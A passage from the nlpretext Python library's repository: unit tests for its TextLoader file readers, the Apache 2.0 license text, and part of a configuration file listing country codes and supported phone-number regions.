18 | # mypy: disable-error-code="attr-defined" 19 | 20 | from pathlib import Path 21 | from unittest.mock import MagicMock, patch 22 | 23 | try: 24 | import dask.bag as db 25 | import dask.dataframe as dd 26 | except ImportError as e: 27 | raise ImportError("please install dask: pip install dask[complete]") from e 28 | 29 | try: 30 | import pandas as pd 31 | except ImportError as e: 32 | raise ImportError("please install pandas: pip install pandas") from e 33 | 34 | import pytest 35 | from nlpretext.preprocessor import Preprocessor 36 | from nlpretext.textloader import TextLoader 37 | from pandas.testing import assert_frame_equal 38 | 39 | # pylint: disable=protected-access 40 | 41 | 42 | @patch("dask.bag.read_text") 43 | def test__read_text_txt_dask(mock_read_text): 44 | # Given 45 | files_path = "some_path/to_read.txt" 46 | file_format = "txt" 47 | encoding = "utf-8" 48 | text_column = "text" 49 | mock_read_text.return_value = db.from_sequence(["This is a text \n", "This is another text \n"]) 50 | 51 | expected_result = dd.from_pandas( 52 | pd.DataFrame({text_column: ["This is a text", "This is another text"]}), 53 | npartitions=2, 54 | ) 55 | 56 | # When 57 | dummy_instance = TextLoader(file_format=file_format, encoding=encoding, text_column=text_column) 58 | actual_result = dummy_instance._read_text_txt(files_path) 59 | 60 | # Then 61 | mock_read_text.assert_called_once_with(files_path, encoding=encoding) 62 | assert_frame_equal(expected_result.compute(), actual_result.compute().reset_index(drop=True)) 63 | 64 | 65 | @patch("pandas.read_fwf") 66 | def test__read_text_txt_pandas(mock_read_text): 67 | # Given 68 | files_path = "some_path/to_read.txt" 69 | file_format = "txt" 70 | encoding = "utf-8" 71 | text_column = "text" 72 | mock_read_text.return_value = pd.DataFrame( 73 | {text_column: ["This is a text", "This is another text"]} 74 | ) 75 | 76 | expected_result = pd.DataFrame({text_column: ["This is a text", "This is another text"]}) 77 | 78 | # When 79 | dummy_instance = TextLoader( 80 | file_format=file_format, 81 | use_dask=False, 82 | encoding=encoding, 83 | text_column=text_column, 84 | ) 85 | actual_result = dummy_instance._read_text_txt(files_path) 86 | 87 | # Then 88 | mock_read_text.assert_called_once_with( 89 | str(Path(files_path).absolute()), encoding=encoding, colspecs=[(None, None)] 90 | ) 91 | assert_frame_equal(expected_result, actual_result.reset_index(drop=True)) 92 | 93 | 94 | @patch("nlpretext._utils.daskloader.dd") 95 | def test__read_text_json_dask(mock_read): 96 | # Given 97 | files_path = "some_path/to_read.json" 98 | file_format = "json" 99 | encoding = "utf-8" 100 | text_column = "text" 101 | 102 | text_ddf = dd.from_pandas( 103 | pd.DataFrame({text_column: ["This is a text", "This is another text"]}), 104 | npartitions=2, 105 | ) 106 | mock_read.read_json.return_value = text_ddf 107 | 108 | expected_result = text_ddf[[text_column]] 109 | 110 | # When 111 | dummy_instance = TextLoader(file_format=file_format, encoding=encoding, text_column=text_column) 112 | actual_result = dummy_instance._read_text_json(files_path) 113 | 114 | # Then 115 | mock_read.read_json.assert_called_once_with(files_path, encoding=encoding) 116 | assert_frame_equal(expected_result.compute(), actual_result.compute()) 117 | 118 | 119 | @patch("nlpretext._utils.pandasloader.read_json") 120 | def test__read_text_json_pandas(mock_read): 121 | # Given 122 | files_path = "some_path/to_read.txt" 123 | file_format = "txt" 124 | encoding = "utf-8" 125 | text_column = "text" 126 | 127 | 
dummy_instance = TextLoader( 128 | file_format=file_format, 129 | use_dask=False, 130 | encoding=encoding, 131 | text_column=text_column, 132 | ) 133 | dummy_instance._read_text_json(files_path) 134 | 135 | # Then 136 | mock_read.assert_called_once_with(files_path, encoding=encoding) 137 | 138 | 139 | @patch("dask.dataframe.read_csv") 140 | def test__read_text_csv_dask(mock_read_csv): 141 | # Given 142 | files_path = "some_path/to_read.csv" 143 | file_format = "csv" 144 | encoding = "utf-8" 145 | text_column = "text" 146 | 147 | text_ddf = dd.from_pandas( 148 | pd.DataFrame({text_column: ["This is a text", "This is another text"]}), 149 | npartitions=2, 150 | ) 151 | mock_read_csv.return_value = text_ddf 152 | 153 | expected_result = text_ddf[[text_column]] 154 | 155 | # When 156 | dummy_instance = TextLoader(file_format=file_format, encoding=encoding, text_column=text_column) 157 | actual_result = dummy_instance._read_text_csv(files_path) 158 | 159 | # Then 160 | mock_read_csv.assert_called_once_with(files_path, encoding=encoding) 161 | assert_frame_equal(expected_result.compute(), actual_result.compute()) 162 | 163 | 164 | @patch("nlpretext._utils.pandasloader.read_csv") 165 | def test__read_text_csv_pandas(mock_read): 166 | # Given 167 | files_path = "some_path/to_read.txt" 168 | file_format = "txt" 169 | encoding = "utf-8" 170 | text_column = "text" 171 | 172 | dummy_instance = TextLoader( 173 | file_format=file_format, 174 | use_dask=False, 175 | encoding=encoding, 176 | text_column=text_column, 177 | ) 178 | dummy_instance._read_text_csv(files_path) 179 | 180 | # Then 181 | mock_read.assert_called_once_with(files_path, encoding=encoding) 182 | 183 | 184 | @patch("dask.dataframe.read_parquet") 185 | def test__read_text_parquet_dask(mock_read_parquet): 186 | # Given 187 | files_path = "some_path/to_read.parquet" 188 | file_format = "parquet" 189 | encoding = "utf-8" 190 | text_column = "text" 191 | 192 | text_ddf = dd.from_pandas( 193 | pd.DataFrame({text_column: ["This is a text", "This is another text"]}), 194 | npartitions=2, 195 | ) 196 | mock_read_parquet.return_value = text_ddf 197 | 198 | expected_result = text_ddf[[text_column]] 199 | 200 | # When 201 | dummy_instance = TextLoader(file_format=file_format, encoding=encoding, text_column=text_column) 202 | actual_result = dummy_instance._read_text_parquet(files_path) 203 | 204 | # Then 205 | mock_read_parquet.assert_called_once_with(files_path, encoding=encoding) 206 | assert_frame_equal(expected_result.compute(), actual_result.compute()) 207 | 208 | 209 | @patch("nlpretext._utils.pandasloader.read_parquet") 210 | def test__read_text_parquet_pandas(mock_read): 211 | # Given 212 | files_path = "some_path/to_read.txt" 213 | file_format = "txt" 214 | encoding = "utf-8" 215 | text_column = "text" 216 | 217 | dummy_instance = TextLoader( 218 | file_format=file_format, 219 | use_dask=False, 220 | encoding=encoding, 221 | text_column=text_column, 222 | ) 223 | dummy_instance._read_text_parquet(files_path) 224 | 225 | # Then 226 | mock_read.assert_called_once_with(files_path, encoding=encoding) 227 | 228 | 229 | @pytest.mark.parametrize( 230 | "files_path, file_format, encoding, compute_to_pandas, preprocessor, expected_format, raised", 231 | [ 232 | ("text_file1.json", None, None, True, None, "json", None), 233 | ("text_file2.json", "json", None, True, None, "json", None), 234 | ("text_file3.csv", None, "utf-8", True, None, "csv", None), 235 | ("text_file4.csv", None, None, False, None, "csv", None), 236 | ("text_file3.parquet", None, 
"utf-8", True, None, "parquet", None), 237 | ("text_file4.parquet", None, None, False, None, "parquet", None), 238 | ("text_file5.pdf", "pdf", None, False, None, "csv", "Format not handled"), 239 | ("text_file6.txt", None, None, False, Preprocessor(), "txt", None), 240 | ( 241 | "text_file8.txt", 242 | None, 243 | None, 244 | False, 245 | MagicMock(), 246 | "txt", 247 | "Only NLPretext preprocessors can be specified", 248 | ), 249 | ], 250 | ) 251 | @patch("nlpretext.preprocessor.Preprocessor.run", return_value="This is a text", autospec=True) 252 | @patch("nlpretext.textloader.TextLoader._read_text_json") 253 | @patch("nlpretext.textloader.TextLoader._read_text_txt") 254 | @patch("nlpretext.textloader.TextLoader._read_text_csv") 255 | @patch("nlpretext.textloader.TextLoader._read_text_parquet") 256 | @patch("nlpretext.textloader.check_text_file_format") 257 | def test_read_text( 258 | mock_check_text_file_format, 259 | mock__read_text_parquet, 260 | mock__read_text_csv, 261 | mock__read_text_txt, 262 | mock__read_text_json, 263 | mock_run, 264 | files_path, 265 | file_format, 266 | encoding, 267 | compute_to_pandas, 268 | preprocessor, 269 | expected_format, 270 | raised, 271 | ): 272 | # Given 273 | text_column = "text" 274 | if encoding is None: 275 | encoding = "utf-8" 276 | 277 | if file_format is None: 278 | mock_check_text_file_format.return_value = expected_format 279 | 280 | mock_reader_mapping = { 281 | "csv": mock__read_text_csv, 282 | "txt": mock__read_text_txt, 283 | "json": mock__read_text_json, 284 | "parquet": mock__read_text_parquet, 285 | } 286 | 287 | expected_result = dd.from_pandas( 288 | pd.DataFrame({text_column: ["Text with #", "Text with double space"]}), 289 | npartitions=2, 290 | ) 291 | mock_reader_mapping.get(expected_format).return_value = expected_result # type: ignore 292 | 293 | # When 294 | dummy_textloader = TextLoader( 295 | text_column=text_column, encoding=encoding, file_format=file_format 296 | ) 297 | 298 | if raised is None: 299 | actual_result = dummy_textloader.read_text( 300 | files_path, file_format, encoding, compute_to_pandas, preprocessor 301 | ) 302 | 303 | # Then 304 | if file_format is None: 305 | mock_check_text_file_format.assert_called_once_with(files_path) 306 | 307 | mock_reader_mapping[expected_format].assert_called_once_with(files_path) 308 | 309 | if preprocessor is not None: 310 | if isinstance(preprocessor, Preprocessor): 311 | mock_run.assert_called() 312 | preprocessed_texts = ["Text with", "Text with double space"] 313 | mock_run.side_effect = preprocessed_texts 314 | expected_result = dd.from_pandas( 315 | pd.DataFrame({text_column: preprocessed_texts}), npartitions=2 316 | ) 317 | 318 | if not compute_to_pandas: 319 | actual_result = actual_result.compute() 320 | assert_frame_equal(expected_result.compute(), actual_result) 321 | 322 | else: 323 | with pytest.raises(ValueError, match=raised): 324 | dummy_textloader.read_text( 325 | files_path, file_format, encoding, compute_to_pandas, preprocessor 326 | ) 327 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 
11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. 
Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 
134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "[]" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright [yyyy] [name of copyright owner] 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 
193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | -------------------------------------------------------------------------------- /nlpretext/_config/config.py: -------------------------------------------------------------------------------- 1 | # GNU Lesser General Public License v3.0 only 2 | # Copyright (C) 2020 Artefact 3 | # licence-information@artefact.com 4 | # 5 | # This program is free software; you can redistribute it and/or 6 | # modify it under the terms of the GNU Lesser General Public 7 | # License as published by the Free Software Foundation; either 8 | # version 3 of the License, or (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | # Lesser General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU Lesser General Public License 16 | # along with this program; if not, write to the Free Software Foundation, 17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 18 | #!/usr/local/bin/python3 19 | from typing import List, Optional 20 | 21 | import os 22 | 23 | import phonenumbers as _phonenumbers 24 | 25 | ROOT_FOLDER = os.path.abspath(os.path.join(os.path.dirname(__file__), "../..")) 26 | 27 | # Country config 28 | COUNTRY_MAPPING_ISO = { 29 | "af": "Afghanistan", 30 | "ax": "Åland Islands", 31 | "al": "Albania", 32 | "dz": "Algeria", 33 | "as": "American Samoa", 34 | "ad": "Andorra", 35 | "ao": "Angola", 36 | "ai": "Anguilla", 37 | "aq": "Antarctica", 38 | "ag": "Antigua and Barbuda", 39 | "ar": "Argentina", 40 | "am": "Armenia", 41 | "aw": "Aruba", 42 | "au": "Australia", 43 | "at": "Austria", 44 | "az": "Azerbaijan", 45 | "bs": "Bahamas", 46 | "bh": "Bahrain", 47 | "bd": "Bangladesh", 48 | "bb": "Barbados", 49 | "by": "Belarus", 50 | "be": "Belgium", 51 | "bz": "Belize", 52 | "bj": "Benin", 53 | "bm": "Bermuda", 54 | "bt": "Bhutan", 55 | "bo": "Bolivia (Plurinational State of)", 56 | "bq": "Bonaire, Sint Eustatius and Saba", 57 | "ba": "Bosnia and Herzegovina", 58 | "bw": "Botswana", 59 | "bv": "Bouvet Island", 60 | "br": "Brazil", 61 | "io": "British Indian Ocean Territory", 62 | "bn": "Brunei Darussalam", 63 | "bg": "Bulgaria", 64 | "bf": "Burkina Faso", 65 | "bi": "Burundi", 66 | "cv": "Cabo Verde", 67 | "kh": "Cambodia", 68 | "cm": "Cameroon", 69 | "ca": "Canada", 70 | "ky": "Cayman Islands", 71 | "cf": "Central African Republic", 72 | "td": "Chad", 73 | "cl": "Chile", 74 | "cn": "China", 75 | "cx": "Christmas Island", 76 | "cc": "Cocos (Keeling) Islands", 77 | "co": "Colombia", 78 | "km": "Comoros", 79 | "cg": "Congo", 80 | "cd": "Congo, Democratic Republic of the", 81 | "ck": "Cook Islands", 82 | "cr": "Costa Rica", 83 | "ci": "Côte d'Ivoire", 84 | "hr": "Croatia", 85 | "cu": "Cuba", 86 | "cw": "Curaçao", 87 | "cy": "Cyprus", 88 | "cz":
"Czechia", 89 | "dk": "Denmark", 90 | "dj": "Djibouti", 91 | "dm": "Dominica", 92 | "do": "Dominican Republic", 93 | "ec": "Ecuador", 94 | "eg": "Egypt", 95 | "sv": "El Salvador", 96 | "gq": "Equatorial Guinea", 97 | "er": "Eritrea", 98 | "ee": "Estonia", 99 | "sz": "Eswatini", 100 | "et": "Ethiopia", 101 | "fk": "Falkland Islands (Malvinas)", 102 | "fo": "Faroe Islands", 103 | "fj": "Fiji", 104 | "fi": "Finland", 105 | "fr": "France", 106 | "gf": "French Guiana", 107 | "pf": "French Polynesia", 108 | "tf": "French Southern Territories", 109 | "ga": "Gabon", 110 | "gm": "Gambia", 111 | "ge": "Georgia", 112 | "de": "Germany", 113 | "gh": "Ghana", 114 | "gi": "Gibraltar", 115 | "gr": "Greece", 116 | "gl": "Greenland", 117 | "gd": "Grenada", 118 | "gp": "Guadeloupe", 119 | "gu": "Guam", 120 | "gt": "Guatemala", 121 | "gg": "Guernsey", 122 | "gn": "Guinea", 123 | "gw": "Guinea-Bissau", 124 | "gy": "Guyana", 125 | "ht": "Haiti", 126 | "hm": "Heard Island and McDonald Islands", 127 | "va": "Holy See", 128 | "hn": "Honduras", 129 | "hk": "Hong Kong", 130 | "hu": "Hungary", 131 | "is": "Iceland", 132 | "in": "India", 133 | "id": "Indonesia", 134 | "ir": "Iran (Islamic Republic of)", 135 | "iq": "Iraq", 136 | "ie": "Ireland", 137 | "im": "Isle of Man", 138 | "il": "Israel", 139 | "it": "Italy", 140 | "jm": "Jamaica", 141 | "jp": "Japan", 142 | "je": "Jersey", 143 | "jo": "Jordan", 144 | "kz": "Kazakhstan", 145 | "ke": "Kenya", 146 | "ki": "Kiribati", 147 | "kp": "Korea (Democratic People's Republic of)", 148 | "kr": "Korea, Republic of", 149 | "kw": "Kuwait", 150 | "kg": "Kyrgyzstan", 151 | "la": "Lao People's Democratic Republic", 152 | "lv": "Latvia", 153 | "lb": "Lebanon", 154 | "ls": "Lesotho", 155 | "lr": "Liberia", 156 | "ly": "Libya", 157 | "li": "Liechtenstein", 158 | "lt": "Lithuania", 159 | "lu": "Luxembourg", 160 | "mo": "Macao", 161 | "mg": "Madagascar", 162 | "mw": "Malawi", 163 | "my": "Malaysia", 164 | "mv": "Maldives", 165 | "ml": "Mali", 166 | "mt": "Malta", 167 | "mh": "Marshall Islands", 168 | "mq": "Martinique", 169 | "mr": "Mauritania", 170 | "mu": "Mauritius", 171 | "yt": "Mayotte", 172 | "mx": "Mexico", 173 | "fm": "Micronesia (Federated States of)", 174 | "md": "Moldova, Republic of", 175 | "mc": "Monaco", 176 | "mn": "Mongolia", 177 | "me": "Montenegro", 178 | "ms": "Montserrat", 179 | "ma": "Morocco", 180 | "mz": "Mozambique", 181 | "mm": "Myanmar", 182 | "na": "Namibia", 183 | "nr": "Nauru", 184 | "np": "Nepal", 185 | "nl": "Netherlands", 186 | "nc": "New Caledonia", 187 | "nz": "New Zealand", 188 | "ni": "Nicaragua", 189 | "ne": "Niger", 190 | "ng": "Nigeria", 191 | "nu": "Niue", 192 | "nf": "Norfolk Island", 193 | "mk": "North Macedonia", 194 | "mp": "Northern Mariana Islands", 195 | "no": "Norway", 196 | "om": "Oman", 197 | "pk": "Pakistan", 198 | "pw": "Palau", 199 | "ps": "Palestine, State of", 200 | "pa": "Panama", 201 | "pg": "Papua New Guinea", 202 | "py": "Paraguay", 203 | "pe": "Peru", 204 | "ph": "Philippines", 205 | "pn": "Pitcairn", 206 | "pl": "Poland", 207 | "pt": "Portugal", 208 | "pr": "Puerto Rico", 209 | "qa": "Qatar", 210 | "re": "Réunion", 211 | "ro": "Romania", 212 | "ru": "Russian Federation", 213 | "rw": "Rwanda", 214 | "bl": "Saint Barthélemy", 215 | "sh": "Saint Helena, Ascension and Tristan da Cunha", 216 | "kn": "Saint Kitts and Nevis", 217 | "lc": "Saint Lucia", 218 | "mf": "Saint Martin (French part)", 219 | "pm": "Saint Pierre and Miquelon", 220 | "vc": "Saint Vincent and the Grenadines", 221 | "ws": "Samoa", 222 | "sm": "San Marino", 223 | 
"st": "Sao Tome and Principe", 224 | "sa": "Saudi Arabia", 225 | "sn": "Senegal", 226 | "rs": "Serbia", 227 | "sc": "Seychelles", 228 | "sl": "Sierra Leone", 229 | "sg": "Singapore", 230 | "sx": "Sint Maarten (Dutch part)", 231 | "sk": "Slovakia", 232 | "si": "Slovenia", 233 | "sb": "Solomon Islands", 234 | "so": "Somalia", 235 | "za": "South Africa", 236 | "gs": "South Georgia and the South Sandwich Islands", 237 | "ss": "South Sudan", 238 | "es": "Spain", 239 | "lk": "Sri Lanka", 240 | "sd": "Sudan", 241 | "sr": "Suriname", 242 | "sj": "Svalbard and Jan Mayen", 243 | "se": "Sweden", 244 | "ch": "Switzerland", 245 | "sy": "Syrian Arab Republic", 246 | "tw": "Taiwan, Province of China", 247 | "tj": "Tajikistan", 248 | "tz": "Tanzania, United Republic of", 249 | "th": "Thailand", 250 | "tl": "Timor-Leste", 251 | "tg": "Togo", 252 | "tk": "Tokelau", 253 | "to": "Tonga", 254 | "tt": "Trinidad and Tobago", 255 | "tn": "Tunisia", 256 | "tr": "Turkey", 257 | "tm": "Turkmenistan", 258 | "tc": "Turks and Caicos Islands", 259 | "tv": "Tuvalu", 260 | "ug": "Uganda", 261 | "ua": "Ukraine", 262 | "ae": "United Arab Emirates", 263 | "gb": "United Kingdom of Great Britain and Northern Ireland", 264 | "us": "United States of America", 265 | "um": "United States Minor Outlying Islands", 266 | "uy": "Uruguay", 267 | "uz": "Uzbekistan", 268 | "vu": "Vanuatu", 269 | "ve": "Venezuela (Bolivarian Republic of)", 270 | "vn": "Viet Nam", 271 | "vg": "Virgin Islands (British)", 272 | "vi": "Virgin Islands (U.S.)", 273 | "wf": "Wallis and Futuna", 274 | "eh": "Western Sahara", 275 | "ye": "Yemen", 276 | "zm": "Zambia", 277 | "zw": "Zimbabwe", 278 | } 279 | 280 | # Phone numbers config 281 | SUPPORTED_COUNTRY: List[Optional[str]] = [ 282 | None, 283 | "US", 284 | "AG", 285 | "AI", 286 | "AS", 287 | "BB", 288 | "BM", 289 | "BS", 290 | "CA", 291 | "DM", 292 | "GD", 293 | "GU", 294 | "JM", 295 | "KN", 296 | "KY", 297 | "LC", 298 | "MP", 299 | "MS", 300 | "PR", 301 | "SX", 302 | "TC", 303 | "TT", 304 | "VC", 305 | "VG", 306 | "VI", 307 | "RU", 308 | "KZ", 309 | "EG", 310 | "ZA", 311 | "GR", 312 | "NL", 313 | "BE", 314 | "FR", 315 | "ES", 316 | "HU", 317 | "IT", 318 | "VA", 319 | "RO", 320 | "CH", 321 | "AT", 322 | "GB", 323 | "GG", 324 | "IM", 325 | "JE", 326 | "DK", 327 | "SE", 328 | "NO", 329 | "SJ", 330 | "PL", 331 | "DE", 332 | "PE", 333 | "MX", 334 | "CU", 335 | "AR", 336 | "BR", 337 | "CL", 338 | "CO", 339 | "VE", 340 | "MY", 341 | "AU", 342 | "CC", 343 | "CX", 344 | "ID", 345 | "PH", 346 | "NZ", 347 | "SG", 348 | "TH", 349 | "JP", 350 | "KR", 351 | "VN", 352 | "CN", 353 | "TR", 354 | "IN", 355 | "PK", 356 | "AF", 357 | "LK", 358 | "MM", 359 | "IR", 360 | "SS", 361 | "MA", 362 | "EH", 363 | "DZ", 364 | "TN", 365 | "LY", 366 | "GM", 367 | "SN", 368 | "MR", 369 | "ML", 370 | "GN", 371 | "CI", 372 | "BF", 373 | "NE", 374 | "TG", 375 | "BJ", 376 | "MU", 377 | "LR", 378 | "SL", 379 | "GH", 380 | "NG", 381 | "TD", 382 | "CF", 383 | "CM", 384 | "CV", 385 | "ST", 386 | "GQ", 387 | "GA", 388 | "CG", 389 | "CD", 390 | "AO", 391 | "GW", 392 | "IO", 393 | "AC", 394 | "SC", 395 | "SD", 396 | "RW", 397 | "ET", 398 | "SO", 399 | "DJ", 400 | "KE", 401 | "TZ", 402 | "UG", 403 | "BI", 404 | "MZ", 405 | "ZM", 406 | "MG", 407 | "RE", 408 | "YT", 409 | "ZW", 410 | "NA", 411 | "MW", 412 | "LS", 413 | "BW", 414 | "SZ", 415 | "KM", 416 | "SH", 417 | "TA", 418 | "ER", 419 | "AW", 420 | "FO", 421 | "GL", 422 | "GI", 423 | "PT", 424 | "LU", 425 | "IE", 426 | "IS", 427 | "AL", 428 | "MT", 429 | "CY", 430 | "FI", 431 | "AX", 432 | "BG", 433 | 
